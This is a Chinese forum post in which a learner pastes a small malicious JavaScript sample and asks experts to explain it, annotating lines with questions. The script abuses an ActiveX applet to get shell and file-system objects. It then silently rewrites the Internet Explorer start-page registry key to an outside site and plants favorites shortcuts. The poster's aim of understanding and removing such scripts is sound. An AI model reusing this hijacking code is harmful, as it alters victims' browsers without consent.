高手帮我讲解一下js脚本病毒,我这里有一个简单的不能称为病毒的东东(学习)
请教写文件的js应该怎么写,找到一个folder.htt还没有仔细看~~
版主或高手请帮我详细讲解,或者有什么地方有函数说明,书之类的最好,,我喜欢自己专研多过于求人,不过你们给大家讲解一下也好,大家也可以知道这种小脚本到底在我们的机器上做了什么,,以后遇到大脚本病毒了,呵呵,可以知道手工怎么解阿!
<SCRIPT>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
//这一段我不知道怎么用语言说,反正我不大懂,就是做一个activeX组件吧,但是js的实现过程只需要这样吗?com没有学什么,,可以说是用com注册一个吗?
斑竹教我!!
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "" + DispName +".URL");
//这个函数不懂不过看意思知道大概意思
Shor.TargetPath = SiteURL;
Shor.Save();
}
//end add favorites or links function
function f(){
try
{
//ActiveX initialization
a1=document.applets[0];//好奇怪的初始化,原理是什么?
a1.setCLSID(""); //com的注册id??是不是
a1.createInstance(); //创建实例?
Shl = a1.GetObject(); //获取这个对象?
a1.setCLSID(""); //是不是初始化一个可以多次使用?
a1.createInstance();
FSO = a1.GetObject(); //文件对象FSO,如果不用这个名字我也猜不出来,
a1.setCLSID("");
a1.createInstance();
Net = a1.GetObject(); //a1这个对象创建了3个实例,它累不累,
try
{
if (document.cookie.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKCUSoftwareMicrosoftInternet ExplorerMainStart Page", "http://sqdj.k666.com/");
//写注册表,folder.htt用到的是写文件的函数,我忘记是什么了,:)
//folder.htt写了一段二进制,应该加过密的,,,不知道编码顺序
//有谁知道阿,我好想知道哦
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
//end set home page
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
//end Write Regedit
//add favorites this is the common part; should be here if you want to add favorites
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
//使用了FSO对象,不过不知道获取的是什么目录,是根目录吗?
loc = WF + "Favorites";
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "Documents and Settings" + Net.UserName + "Favorites"; //net.username这个用法,,蛮有意思,呵呵,,收藏
if(!FSO.FolderExists(loc))
{
return;
}
}
//end common part
//the following line is used for adding favorites.
//to add multiple favorites, duplicate the following line, changing the last 2 paramaters.
AddFavLnk(loc, "");
//end add favorites
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
//最无聊的是这里,我的机器被它搞的好慢,原来是这个死循环,搞的我莫明奇妙
//超级无聊,谁在写这种东西,要它去死,,虚假的运行,要是格我硬盘搞的我机器慢,我才服了他那,呵呵
{
setTimeout("f()", 1000);
}
init();
</SCRIPT>